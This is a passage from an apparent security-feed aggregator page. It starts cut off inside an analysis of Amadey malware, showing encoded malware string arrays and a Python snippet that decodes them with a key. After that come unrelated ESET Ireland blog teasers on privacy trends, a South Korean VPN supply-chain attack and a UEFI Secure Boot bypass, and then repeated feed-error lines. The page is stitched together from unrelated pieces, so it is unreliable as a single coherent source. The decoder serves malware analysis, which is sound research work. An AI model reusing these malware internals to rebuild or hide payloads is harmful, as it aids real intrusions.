0xAD, 0x61, 0x82, 0x9E, 0xA1, 0xC9, 0xA4, 0xCC, 0x6E, 0x59] Post6=[0x88, 0xB4, 0xB5, 0xB8, 0x53, 0x68] RunAs=[0xAA, 0xDA, 0xD0, 0xC5, 0xA6] RunDll_0=[0xAA, 0xDA, 0xD0, 0xC8, 0x9F, 0xA5, 0x6C, 0x66, 0x64, 0x9E, 0xAB, 0xC7, 0x50] Script=[0xA8, 0xD5, 0xCD, 0x93, 0x9C, 0xA7, 0x9D, 0x99, 0xAE, 0x67, 0xA3, 0xCA, 0xA0] Shell=[0x8B, 0xAD, 0xA7, 0xB0, 0x7F, 0x6C, 0x6B, 0x62, 0x7A, 0x85, 0x7F] TimeOut=[0x60, 0xEA, 0x00, 0x00, 0x44] URLMon_0=[0xAD, 0xD7, 0xCE, 0xD1, 0xA2, 0xA7] URLMon_1=[0x8D, 0xB7, 0xAE, 0xA8, 0xA2, 0xB0, 0xA7, 0xA0, 0xA5, 0x9A, 0x97, 0xB6, 0x9F, 0xAA, 0x9D, 0xA5, 0x9C, 0x77] Vers=[0x69, 0x93, 0x94, 0x96] ZoneIdent =[0x72, 0xBF, 0xD1, 0xD2, 0x98, 0x67, 0x82, 0x98, 0x9B, 0xA7, 0xA7, 0xCB, 0x96, 0xCD, 0x99, 0xAB] ''' encoded_str=[0x9F, 0xD4, 0xCA, 0xC5, 0x9C, 0x9E, 0xA7, 0x98, 0xA5, 0x67, 0x96, 0xD1, 0x9D] Key="8ebd3994693b0d4976021758c2d7bff793b0d4976021758c2d7bff7" c=0 while(1): length = len(encoded_str) if length <= c: break length = len(Key); print(chr(encoded_str[c] - ord(Key[c % length])), end='') #print(encoded_str[c] - ord(Key[c % length]), end='') c += 1 </code></pre></div></div> <h1 id="references">References</h1> <ul> <li>https://krabsonsecurity.com/2019/02/13/analyzing-amadey-a-simple-native-malware/</li> </ul>
The evolving landscape of data privacy: Key trends to shape 2025

Thu, 23 Jan 2025 12:06:40 -0000

Incoming laws, combined with broader developments on the threat landscape, will create further complexity and urgency for security and compliance teams. As Data Privacy Week (January 27-31) and Data Protection Day (January 28) approach, it’s the perfect time to spotlight the critical role data protection plays in the success of modern organizations. In fact, privacy and data protection go … <a class="more-link" href="https://blog.eset.ie/2025/01/23/the-evolving-landscape-of-data-privacy-key-trends-to-shape-2025/">More The evolving landscape of data privacy: Key trends to shape 2025</a>
ESET discovers new APT group and its supply chain attack on South Korean VPN service

Wed, 22 Jan 2025 09:53:44 -0000

ESET researchers have discovered a supply-chain attack against a VPN provider in South Korea by a newly discovered and previously undetected China-aligned APT group that ESET has named PlushDaemon. In this cyberespionage operation, the attackers replaced the legitimate installer with one that also deployed the group’s signature implant, which ESET has named SlowStepper — a … <a class="more-link" href="https://blog.eset.ie/2025/01/22/eset-discovers-new-apt-group-and-its-supply-chain-attack-on-south-korean-vpn-service/">More ESET discovers new APT group and its supply chain attack on South Korean VPN service</a>
Under lock and key: Protecting corporate data from cyberthreats in 2025

Tue, 21 Jan 2025 12:05:23 -0000

Data breaches can cause a loss of revenue and market value as a result of diminished customer trust and reputational damage. There were over 3,200 data compromises in the United States in 2023, with 353 million victims, including those affected multiple times, according to the US Identity Theft Resource Center (ITRC). Each one of those individuals … <a class="more-link" href="https://blog.eset.ie/2025/01/21/under-lock-and-key-protecting-corporate-data-from-cyberthreats-in-2025/">More Under lock and key: Protecting corporate data from cyberthreats in 2025</a>
Europe prepared strategy to protect hospitals from cyberattacks

Thu, 16 Jan 2025 11:05:05 -0000

The European Union is stepping in to help hospitals and healthcare providers combat increasing cyberattacks. According to Politico*, the European Commission has unveiled “action plan” to enhance cybersecurity in the sector, which includes additional funding for securing hospitals’ technical infrastructure, guidance on applying existing rules like the EU’s NIS2 cybersecurity directive, and improved information-sharing. Since … <a class="more-link" href="https://blog.eset.ie/2025/01/16/europe-prepared-strategy-to-protect-hospitals-from-cyberattacks/">More Europe prepared strategy to protect hospitals from cyberattacks</a>
ESET Research discovers UEFI Secure Boot bypass vulnerability

Thu, 16 Jan 2025 10:28:03 -0000

ESET researchers have discovered a vulnerability, affecting the majority of UEFI-based systems, that allows actors to bypass UEFI Secure Boot. This vulnerability, assigned CVE-2024-7344, was found in a UEFI application signed by Microsoft’s “Microsoft Corporation UEFI CA 2011” third-party UEFI certificate. Exploitation of this vulnerability can lead to the execution of untrusted code during system … <a class="more-link" href="https://blog.eset.ie/2025/01/16/eset-research-discovers-uefi-secure-boot-bypass-vulnerability/">More ESET Research discovers UEFI Secure Boot bypass vulnerability</a>

Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ 日本語版 & nao_sec & ESET Ireland & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided

Pipes Feed Preview: Feed not found & SECURITY.COM & TeamT5 Blog & Natto Thoughts & JPCERT/CCブログ日本語版 & nao_sec & ESET Ireland & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided & No Feed provided